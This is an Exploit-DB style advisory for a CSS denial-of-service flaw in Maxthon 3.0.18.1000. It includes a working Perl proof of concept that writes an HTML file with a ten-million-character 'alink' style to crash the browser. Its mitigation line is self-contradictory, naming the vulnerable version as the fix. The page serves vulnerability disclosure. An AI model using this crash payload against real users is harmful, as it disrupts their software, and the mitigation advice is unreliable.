Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability

vendor:

Maxthon

by:

4n0nym0us (Arash Sa'adatfar)

7,5

CVSS

HIGH

Denial of Service

CWE

Product Name: Maxthon

Affected Version From: 3.0.18

Affected Version To: 3.0.18

Patch Exists: YES

Related CWE: N/A

CPE: a:maxthon:maxthon:3.0.18

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 Ultimate 32-bit

2020

Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability

A denial of service vulnerability exists in Maxthon 3.0.18.1000 due to a lack of proper validation of user-supplied input when handling CSS styles. An attacker can exploit this vulnerability by creating a specially crafted HTML file containing a large number of 'alink' CSS styles, which can cause the application to crash when the file is opened.

Mitigation:

Upgrade to the latest version of Maxthon 3.0.18.1000 or later.

Source

Exploit-DB raw data:

# 
######################################################################################### 
#                                                                                       # 
#  Title: Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability                       # 
#  Author: 4n0nym0us (Arash Sa'adatfar)                                                 # 
#  Developer: Maxthon International                                                     # 
#  Version:3.0.18                                                                       # 
#  Software Link: http://dl.maxthon.com/mx3/mx3.0.18.1000.exe                           # 
#                                                                                       # 
#  Tested On: Windows 7 Ultimate 32-bit                                                 # 
#                                                                                       # 
######################################################################################### 
# 
#!/usr/bin/perl 
my $file= "Crash.html"; 
my $junk= "A/" x 10000000;  
open($FILE,">$file"); 
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {alink: ".$junk."}\n</style>\n</head>\n</html>"; 
print "\nCrash.html File Created successfully\n"; 
close($FILE);